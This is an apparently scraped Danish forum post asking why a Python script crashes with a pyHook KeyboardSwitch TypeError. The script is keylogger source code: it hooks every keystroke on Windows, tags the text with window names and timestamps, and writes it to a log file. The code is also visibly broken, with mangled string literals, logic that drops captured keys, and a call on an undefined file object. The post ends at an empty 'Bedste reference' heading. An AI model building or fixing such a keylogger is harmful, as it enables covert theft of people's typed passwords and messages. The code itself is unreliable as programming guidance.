windows - Python-programmet er stoppet

Indlæg af Hanne Mølgaard Plasc

ProblemNår jeg trykker på en hvilken som helst tast, kolliderer mit script (Program python er ophørt med at arbejde) med følgende fejl:


Error: TypeError: KeyboardSwitch() missing 8 required positional arguments: 'msg', 'vk\_
code', 'scan\_code', 'ascii', 'flags', 'time', 'hwnd', and 'win\_name'


Kode:


def OnKeyboardEvent(event):
  global current\_window
  global keylog
  global file
  if current\_window != event.WindowName:
      current\_window = event.WindowName
      keylog += "

[{}] @ {}
".format(current\_window, time.ctime())

  key = ""
  if event.Ascii == 8:
    key = '[Backspace]'
  elif event.Ascii == 13:
    key = '
'
  elif event.Ascii == 27:
    key = '[ESC]'
  elif event.Ascii:
    key = chr(event.Ascii)
  else:
    keylog += key

  if len(keylog) == 40:
    f.open(filename, "a")
    f.write("

")
    f.write(keylog)
    f.close()


hm = pyHook.HookManager()
hm.KeyDown = OnKeyboardEvent
hm.HookKeyboard()
while True:
    try:
      while True:
        pythoncom.PumpMessages()
    except KeyboardInterrupt:
        pass

Bedste reference